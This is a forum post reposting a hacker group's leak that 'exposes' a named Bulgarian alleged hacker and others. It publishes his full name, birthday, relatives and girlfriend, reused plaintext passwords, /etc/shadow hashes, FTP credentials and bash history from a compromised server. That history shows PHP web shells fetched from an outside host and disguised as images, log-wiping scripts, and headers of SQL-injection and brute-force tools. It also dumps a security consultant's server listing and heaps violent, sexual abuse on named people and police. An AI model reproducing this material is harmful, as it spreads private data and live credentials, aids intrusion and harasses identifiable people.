SlaserX - Bulgarian Hacker Details Exposed

... баце :D
Аватар
LuD
The Sinner's Priest ;-]
The Sinner's Priest ;-]
Мнения: 205
Регистриран на: 10 Окт 2012 15:44
Местоположение: Sofia
Обратна връзка:

SlaserX - Bulgarian Hacker Details Exposed

Непрочетено мнение от LuD »

LOL > SlaserX < LOL
LOL > Pirate-Sky < LOL
LOL > SecurityGuy < LOL



* LOL * SlaserX * LOL *


SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!

Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?

Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.

[1] http://press.mvr.bg/en/News/news120704_08.htm

>> So, who's this guy?

First Name: Ivan
Last Name: Bachvarov
Nickname: SlaSerX
Birthday: 21.07.1986
Height: 1.76cm
Father: Jecho Bachvarov
Sister: Mariana Bachvarova
Girlfriend: Mihaela Mandalcheva
Location: Burgas, Bulgaria

>> Let's take a look at what his passwords look like.

vbox7.com (slaserx:1986125),
hit.bg (slaserx:1986125),
theunkn0wn.org (slaserx:1986125),
kaldata.com (slaserx:1986125),
bghelp.bg (slaserx:1986125),
etc.

>> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

>> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.

root@bgdns:/root# uname -a
Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux


root@bgdns:/root# w
23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
root pts/1 office 17:37 5:17m 0.34s 0.34s -bash


root@bgdns:/root# cat /etc/shadow
root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
daemon:*:15024:0:99999:7:::
bin:*:15024:0:99999:7:::
sys:*:15024:0:99999:7:::
sync:*:15024:0:99999:7:::
games:*:15024:0:99999:7:::
man:*:15024:0:99999:7:::
lp:*:15024:0:99999:7:::
mail:*:15024:0:99999:7:::
news:*:15024:0:99999:7:::
uucp:*:15024:0:99999:7:::
proxy:*:15024:0:99999:7:::
www-data:*:15024:0:99999:7:::
backup:*:15024:0:99999:7:::
list:*:15024:0:99999:7:::
irc:*:15024:0:99999:7:::
gnats:*:15024:0:99999:7:::
nobody:*:15024:0:99999:7:::
libuuid:!:15024:0:99999:7:::
Debian-exim:!:15024:0:99999:7:::
statd:*:15024:0:99999:7:::
sshd:*:15024:0:99999:7:::
slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
postfix:*:15024:0:99999:7:::
mysql:!:15024:0:99999:7:::
bind:*:15024:0:99999:7:::
polw:!:15024:0:99999:7:::
postgrey:*:15024:0:99999:7:::
proftpd:!:15024:0:99999:7:::
ftp:*:15024:0:99999:7:::
vmail:!:15024:0:99999:7:::
vu2000:!:15024:0:99999:7:::
vu2001:!:15024:0:99999:7:::
vu2002:!:15024:0:99999:7:::
vu2003:!:15024:0:99999:7:::
snmp:*:15025:0:99999:7:::
vu2004:!:15025:0:99999:7:::
vu2005:!:15031:0:99999:7:::
vu2006:!:15034:0:99999:7:::
vu2007:!:15034:0:99999:7:::
vu2008:!:15035:0:99999:7:::
messagebus:*:15038:0:99999:7:::
lbcd:*:15038:0:99999:7:::
vu2009:!:15039:0:99999:7:::

>> Ever wondered what the most powerful hacker tools look like? Well, take look..

root@bgdns:/root# head -25 l33t/a.pl
#!/usr/bin/perl

use IO::Socket;


print q{
#######################################################################
# vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
# By indoushka #
# www.iq-ty.com/vb #
# Souk Naamane (00213771818860) #
# Algeria Hackerz ([email protected]) #
# Dork: Powered by vBulletin. Version 4.0.1 #
#######################################################################
};

if (!$ARGV[2]) {

print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid

perl VB4.0.1.pl www.vb.com /forum/ 1


};


root@bgdns:/root# head -5 l33t/gen
#!/usr/bin/perl
##
### bren.pl . Generate every character combination for 15 characters in length(ughh.)
##
#


root@bgdns:/root# head -30 l33t/t.pl
#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT]
  • [File] #
    #-------------------------------------------------------------#
    # [Host] : victim Host (simorgh-ev.com) #
    # [User] : User Name (demo) #
    # [PORT] : Port of Cpanel (2082) #
    #
    • : File Of password list (list.txt) #
      # [File] : file for save password (password.txt) #
      # #
      ###############################################################
      # (c)oded By Hessam-x / simorgh-ev.com #
      ###############################################################
      );exit;}


      root@bgdns:/root# tar tvf tools.tar
      drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
      -rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
      -rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
      -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
      -rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
      drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
      -rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
      -rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
      -rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
      -rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
      -rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
      -rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
      -rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
      -rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
      -rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
      -rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
      -rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
      -rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
      -rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
      -rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
      -rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
      -rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
      -rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
      -rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
      drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
      -rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
      -rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
      -rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
      -rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
      -rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
      -rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
      -rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
      -rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
      drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
      -rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
      -rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
      -rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
      -rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc


      root@bgdns:/root# tar tzvf t.tar.gz
      drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
      -rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
      -rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
      -rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
      -rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
      -rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
      -rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
      -rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
      -rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
      -rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen


      root@bgdns:/root# cat .bash_alias
      # some more ls aliases
      alias less='less -SR'
      alias l='ls -lLBhX --time-style=locale'
      alias la='ls -la $1 | less'
      alias ll='ls -lX'
      alias lx='ls -lXB' #sort by ext
      alias lk='ls -lSr' #soft by size

      # Alias's to modifed commands
      alias ps='ps auxf'
      alias home='cd ~'
      alias pg='ps aux | grep' #requires an argument
      alias lg='ls -la | grep' #requires an argument
      alias un='tar -zxvf'
      alias df='df -hT'
      alias ping='ping -c 10'
      #alias net-restart='sudo /etc/init.d/networking restart'
      #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
      alias ..='cd ..'
      alias update='sudo apt-get update'
      alias upgrade='sudo apt-get upgrade'
      alias install='sudo apt-get install'
      alias remove='sudo apt-get remove'
      #alias eclipse='eclipse -vmargs -Xmx512M'
      #alias firefox='firefox-3.5'
      alias ipconfig='ifconfig -a'

      #My alias
      alias flood='netstat'
      alias stop='/root/tools/stop.flood'
      alias ban='/root/tools/ban.pl'
      alias unban='/root/tools/unban.pl'
      alias monitor='/root/tools/monitor.sh'
      alias cron='env EDITOR=nano crontab -e'
      alias editcfg='pico /var/www/ispcp/gui/index.php'
      alias arest='/etc/init.d/apache2 restart'
      alias cls='clear'
      alias q='exit'
      # Some ssh connections
      alias shell='ssh -l slaserx slaserx.ath.cx'
      #alias xalo='sudo vpnc-connect xalo.conf'

      # Some ping commands
      #alias pga='ping 192.168.1.1 -c 10'
      #alias pgo='ping google.com -c 10'
      #alias phk='ping hkvn.info -c 10'
      #alias pch='ping chuyenhungyen.org -c 10'

      #Some chmod commands
      alias mx='chmod a+x'
      alias 000='chmod 000'
      alias 644='chmod 644'
      alias 755='chmod 755'


      # cat .bash_history
      clear
      nmap localhost
      exit
      host perfektno.com
      w
      iptables -L |grep 77.78.36.40
      ban 77.78.36.40
      pico /etc/init.d/firewall
      ls -a
      iptables -L
      clear
      search metaspolit
      search metasploit
      search icmp rate
      pico /etc/init.d/firewall
      iptables -L
      stop
      flood
      clear
      exit
      pico /etc/networks
      pico /etc/network/interfaces
      exit
      host cs-adrenalines.info
      host 79.124.67.194
      stop
      flood
      cat /var/log/fail2ban.log
      cat /var/log/psad/fw_check
      cat /var/log/psad/top_attackers
      clear
      clear
      stop
      exit
      cd l33t/
      wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
      ls -a
      wget
      wget --help
      wget --help |grep ssl
      wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
      tar -jxvf nikto-2.1.4.tar.bz2
      cd nikto-2.1.4/
      ls -a
      ./nikto.pl
      ./nikto.pl -host abv.bg -root
      ./nikto.pl -host abv.bg -root+
      ./nikto.pl -host abv.bg
      ./nikto.pl
      ./nikto.pl -host
      ./nikto.pl -host pweb.co.cc
      w
      last
      flood
      stop
      apachectl restart
      stop
      apachectl restart
      cd /root/tools/
      ./dellog
      cat /var/log/apache2/pirate-sky.info-combined.log
      cat /var/log/apache2/pirate-sky.info-combined.log
      cat /var/log/apache2/pirate-sky.info-combined.log
      iptables -L
      host eco.gov.kz
      cat /var/log/apache2/pirate-sky.info-combined.log
      apachectl restart
      apachectl restart
      ls -a
      cron
      cron
      /etc/init.d/cron restart
      cd /var/www/virtual/warez-database.org/htdocs/
      ls -a
      cd hooks/
      ls -a
      cd ..
      ls -a
      cd converge_local/
      ls -a
      ls -a
      ls -a
      wget xpls.hit.bg/shell/shell.gif
      rm -rf shell.gif
      wget xpls.hit.bg/shell/linuxbg.shell
      wget xpls.hit.bg/shell/linuxbg.gif
      rm -rf linuxbg.*
      ls -a
      ls -a
      mv /home/slaserx/faq.php ./
      ls -a
      rm -rf .htaccess
      ls -a
      rm -rf faq.php
      /
      cd /
      pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
      pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
      clear
      whois privatecrew.net
      whois privatecrew.net
      whois bgdns.info
      host freebsd.bg
      clear
      genpasswd
      clear
      genpasswd
      genpasswd
      genpasswd
      ls -a
      cd /var/www/virtual/privatecrew.net/htdocs/
      ls -s
      ls -a
      rm -rf *
      ls -a
      ls -a
      cd ..
      cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
      ls -a
      cat ../pirate-sky.info/htdocs/conf_global.php
      ls -a
      cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
      clear
      ls -a
      rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
      rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
      genpasswd
      genpasswd
      genpasswd
      ls -a
      cd htdocs/
      ls -a
      pico /etc/init.d/firewall
      cat /etc/init.d/firewall
      iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
      pico /etc/init.d/firewall
      /etc/init.d/firewall
      flood
      stop
      ls -a
      iptables -L |grep 94.156.142.66
      iptables -L |grep lucifer
      stop
      iptables -L |grep 95.42.32.36
      iptables -L
      cd /var/www/fcgi/
      ls -a
      pico warez-database.org/php5/php.ini
      pico privatecrew.net/php5/php.ini
      pico privatecrew.net/php5/php.ini
      apachectl restart
      pico privatecrew.net/php5/php.ini
      apachectl restart
      ls -a
      pico pirate-sky.com/php5/php.ini
      pico privatecrew.net/php5/php.ini
      apachectl restart
      cd /root/tools/
      ls -a
      cd shells/
      pico new.p
      pico new
      ls -a
      ./a
      ls -a
      pico find.r57
      pico new
      ./find.
      ./new
      ls -a
      ls -a
      cd /var/www/virtual/
      ls -a
      cd privatecrew.net/htdocs/
      cd /root/tools/
      cd shells/
      ./new
      ls -a
      pico new
      pico find.eval
      ls -a
      pico new
      pico new
      ./new
      ls -a
      pico new
      ls -a
      ./new
      ls -a
      pico new
      ls -a
      ./new
      pico new
      ./new
      ls -a
      rm -rf new
      pico find.shell
      cat scan.txt
      pico scan.txt
      rm -rf scan.txt
      ls -a
      ./find.shell
      ls -a
      cat scan.txt
      ls -a
      rm -rf scan.txt
      cat sc
      ls -a
      pico find.shell
      pico find.shell
      ./find.shell
      cat scan.txt
      rm -rf scan.txt
      ls -a
      ./find.shell
      cat scan.txt
      cat scan.txt |grep faq.php
      ls -a
      rm -rf scan.txt
      pico /var/www/virtual/privatecrew.net/htdocs/faq.php
      pico find.shell
      ls -a
      ./find.
      ./find.shell
      cat scan.txt
      ls -a
      clear
      cd /var/www/virtual/
      ls -a
      cd privatecrew.net/
      ls -a
      cd htdocs/
      cd 0893552070/
      ls -a
      wget http://xpls.hit.bg/shell/c99.gif
      wget http://xpls.hit.bg/shell/devil.gif
      wget http://xpls.hit.bg/shell/linux.gif
      ls -a
      mv linux.gif linux.php
      ls -a
      mv devil.gif devil.php
      mv c99.gif c99.php
      ls -a
      wget http://xpls.hit.bg/shell/shell.gif
      mv shell.gif shell.php
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
      rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
      ls -a
      ls -a
      ls -a
      clear
      ls -a
      cd ..
      rm -rf 0893552070/
      ls -a
      exit
      ls -a
      ls -a
      cd /var/www/virtual/pirate-sky.
      cd /var/www/virtual/privatecrew.net/htdocs/
      ls -a
      cd a
      ls -a
      cd asd/
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      rm crontab -l
      crontab -l
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      cd ..
      ls -a
      ls -a
      rm -rf admin/
      rm -rf cache/
      rm -rf con*
      ls -a
      rm -rf includes/
      ls -a
      ls -a
      rm -rf interface/
      rm -rf ips_kernel/
      ls -a
      rm -rf public/
      rm -rf starforum/
      ls -a
      rm -rf uploads/
      ls -a
      ls -a
      ls -a
      cd ..
      cd htdocs/
      cd ..
      cd backups/
      ls -a
      cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
      cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
      ls -a
      pico /etc/crontab
      ls -a
      cd ..
      ls -a
      cd htdocs/
      ls -a
      cd ..
      cd backups/
      rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
      cd ..
      cd htdocs/
      cd pp/
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      host mikrotik-bg.net
      host 195.191.149.89
      cat /var/log/cron.log
      ls -a
      crontab -l
      cron
      /etc/init.d/cron restart
      /etc/init.d/cron status
      ls -a
      ls -a
      cat /var/log/cron.log
      cat /var/log/cron.log |grep err
      clear
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      cat /var/log/cron.log
      ls -a
      ls -a
      crontab -l
      ls -a
      ls -a
      cat /var/log/cron.log
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls
      ls
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -la
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      cat /var/log/cron.log
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      wget xpls.hit.bg/shell.gif
      wget xpls.hit.bg/linux.gif
      mv linux.gif linux.php
      mv shell.gif shell.php
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      rm -rf /tmp/scan.txt
      ls -a
      ls -a
      ls -la
      ls -a
      ls -a
      ls -a
      pico linux.php
      ls -a
      rm -rf linux.php
      rm -rf shell.php
      ls -a
      ls -a
      wget xpls.hit.bg/shell/shell.gif
      wget xpls.hit.bg/shell/linux.gif
      mv linux.gif linux.php
      mv shell.gif shell.php
      pico shell.php
      ls -a
      pico shell.php
      ls -a
      wget xpls.hit.bg/shell/shell.gif
      mv linux.gif linux.php
      wget xpls.hit.bg/shell/linux.gif
      ls -a
      mv linux.gif linux.php
      mv shell.gif shell.php
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      cat /tmp/scan.txt
      ls -a
      ls -a
      ls -a
      ls -a
      cat /var/log/cron.log
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      ls -a
      cd ..
      cd ..
      cd ..
      cd ..
      exit
      cd /var/www/virtual/
      ls -a
      cd linuxbg.info/
      cd backups/
      ls -a
      rm -rf t3es_vb.sql.bz2
      ls -a
      rm -rf t3es_soze.sql.bz2
      ls -a
      whois cms-bg.com
      whois jump.bg
      stop
      cat /tmp/scan.txt
      cat /var/log/apache2/other_vhosts_access.log
      cat /var/log/apache2/default-error.log
      clear
      cat /var/log/apache2/default-error.log
      clear
      cat /var/log/apache2/default-error.log
      cat /var/log/apache2/default-error.log
      cat /var/log/apache2/default-error.log
      clear
      clear
      clear
      exit
      os -a
      pico /etc/init.d/firewall
      ping abv.bg
      ls -a
      exit


      root@bgdns:/root/tools/backup# cat backup-psc
      #!/bin/sh
      #Created by SlaSerX
      #red='1;31m'
      TARGET_EMAIL="[email protected]"

      # local directory to pickup *.tar.gz file

      tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/

      # ftp remote connections

      FTPU="backup" # ftp login name
      FTPP="1986125" # ftp password
      FTPS="85.217.204.199" # remote ftp server
      FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
      LOCALD="/backup/psc/*.tgz"
      ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD

      echo
      echo -e " \e[${red} Upload psc Backup \e[m"
      echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
      echo

      root@bgdns:/root/tools# head -10 check.ssh
      #!/usr/bin/perl
      ##############################################################################
      # By BumbleBeeWare.com 2006
      # SSH Log Checker
      # sshlogcheck.cgi
      # reads ssh log and blocks hacking attempts using ip tables
      ##############################################################################
      # CONFIGURE
      ##############################################################################


      root@bgdns:/root/tools# cat dellog
      #!/bin/bash
      #Created by SlaSerX
      red='1;31m'
      /bin/rm -rf /var/log/apache2/*.log
      /bin/rm -rf /var/log/apache2/*.log.*
      /bin/rm -rf /var/log/apache2/users/*.log
      /bin/rm -rf /var/log/apache2/users/*.log.*
      /etc/init.d/apache2 restart
      echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"


      root@bgdns:/root/tools# cat grep.404
      grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' '[email protected]'

      >> Refer to the URL at the end of the file for some more fun.



      * LOL * Pirate-Sky * LOL *

      Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.

      You can clearly see how randomly they choose their targets -
      http://www.zone-h.org/archive/notifier= ... 20Invasion

      >> Check the aforementioned URL for their databases. ;)



      * LOL * SecurityGuy * LOL *

      Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.

      >> Let's just briefly review what's this bitch up to.

      [email protected] [/home/nopasara/public_html/securityguy]# uname -a
      Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux


      [email protected] [/home/nopasara/public_html/securityguy]# id
      uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)


      [email protected] [/home/nopasara]# ls -lia
      total 28108
      35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
      2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
      35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
      35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
      35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
      35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
      35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
      35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
      35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
      35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
      35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
      35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
      35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
      35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
      35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
      35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
      35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
      35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
      35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
      36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
      35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
      35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
      36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
      35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
      35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
      35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
      35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
      35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
      35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
      35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
      35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
      35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
      35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
      35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
      35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/


      [email protected] [/home/nopasara/public_html]# ls -lia
      total 2286196
      35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
      35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
      35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
      35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
      35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
      35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
      35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
      37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
      35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
      35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
      36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
      35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
      35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
      35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
      35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
      35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
      37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
      36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
      35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
      36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
      35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
      35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
      35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
      35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
      36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/


      [email protected] [/home/nopasara/public_html/securityguy]# ls -lia
      total 5722468
      36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
      35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
      36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
      36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
      37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
      36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
      36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
      37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
      36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
